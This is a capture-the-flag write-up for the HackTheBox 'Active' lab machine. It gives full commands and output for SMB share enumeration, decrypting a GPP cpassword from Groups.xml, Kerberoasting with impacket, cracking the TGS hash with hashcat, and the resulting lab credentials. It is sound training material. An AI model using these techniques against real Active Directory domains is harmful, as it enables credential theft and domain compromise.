Active (Easy)
Post

Active (Easy)

Host entries

1
10.10.10.100  active.htb

If Active Directory => NTP Synchronization with the domain controller.

Content

  • SMB Enumeration
  • SMB Full share replication to local machine [[SMB Download]] smbclient mget*
  • GPP Decryption
  • Kerberoasting
  • Hashcat TGS crack

Reconnaissance

Initial reconnaissance for TCP ports

1
2
3
4
nmap -p- --open --min-rate 5000 -Pn -n -vvv -oG allPorts 10.10.10.100
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.100 ()   Status: Up
Host: 10.10.10.100 ()   Ports: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 464/open/tcp//kpasswd5///, 593/open/tcp//http-rpc-epmap///, 636/open/tcp//ldapssl///, 3268/open/tcp//globalcatLDAP///, 3269/open/tcp//globalcatLDAPssl///, 9389/open/tcp//adws///, 47001/open/tcp//winrm///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49157/open/tcp//unknown///, 49158/open/tcp//unknown///, 49165/open/tcp//unknown///, 49166/open/tcp//unknown///, 49168/open/tcp//unknown///

Services and Versions running:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49168 -sCV -Pn -n -vvv -oN targeted 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up, received user-set (0.089s latency).
Scanned at 2023-02-09 00:37:51 EST for 73s

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-02-09 05:37:58Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         syn-ack Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack Microsoft Windows RPC
49166/tcp open  msrpc         syn-ack Microsoft Windows RPC
49168/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
|_clock-skew: 0s
| smb2-time: 
|   date: 2023-02-09T05:38:55
|_  start_date: 2023-02-09T05:22:50
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 38577/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 40109/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 51069/udp): CLEAN (Timeout)
|   Check 4 (port 38631/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Enumerating port 445 we identify that we have Read access to the Replication share:

1
2
3
4
5
6
7
8
9
10
11
12
13
crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\: 
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share   Permissions  Remark
SMB 10.10.10.100 445 DC -----   -----------  ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$  Default share
SMB 10.10.10.100 445 DC IPC$Remote IPC
SMB 10.10.10.100 445 DC NETLOGON  Logon server share 
SMB 10.10.10.100 445 DC Replication  READ 
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users

We then enumerate the share, it has a lot of information within so we rather prefer to download the whole volume locally1:

1
2
3
4
5
6
7
# First connect to the machine
smbclient //10.10.10.100/Replication -N
# Then turn off the Prompt and turn on the replicate function
smb: \> RECURSE ON
smb: \> PROMPT OFF
# Finally extract all the files
smb: \> mget *

We then check what info is within the share: Description

Exploitation

This structure is very similar to the SYSVOL share so we know that there is a Groups.xml, this file can have a GPP hash that can be decrypted2:

1
2
3
4
cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

And we can decrypt the cpassword with gpp-decrypt utility:

1
2
3
4
# Decrypting cpassword
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

Privilege Escalation

Now, since we know that there is no port tcp-5985 to login directly open we can keep the enumeration on port tcp-445, the next share interesting is not SYSVOL but Users and this is its structure: Description After a deep enumeration, we couldn’t identify any useful file that could provide a privesc or a lateral movement so we tried another approach which is a [[Kerberoasting (Service Account Attacks)]]. ^659f81

1
2
3
4
5
6
7
8
9
10
11
12
13
impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-02-09 00:24:03.458965             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$
...
d03f8fe0c361c57c9c755c7d8a1024dd38c4beaf73a3688eb2c103450979c4e729c0b6d21a44160b71cc6             

This means that we can extract a TGS ticket directly from the DC, and we successfully get it, so next thing to do is to crack it with Hashcat:

1
2
3
4
5
6
7
D:\Programas\hashcat-6.2.5>hashcat.exe -m 13100 -a 0 hash.txt rockyou.txt
hashcat (v6.2.5) starting


$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$
...
f0cc1679087568696baa79fef670721b$0bd9f0addc75c15876fda2aae6fc4a9611250979c4e729c0b6d21a44160b71cc6:Ticketmaster1968

Credentials

1
2
3
svc_tgs:GPPstillStandingStrong2k18
Administrator:Ticketmaster1968

Notes

  • We can extract a share with SMB directly by abusing of the [[SMB Download]] with SMBClient mget * functionality.

References

  1. Download an entire SMB share locally. 

  2. SYSVOL (Groups.xml) gpp decrypt.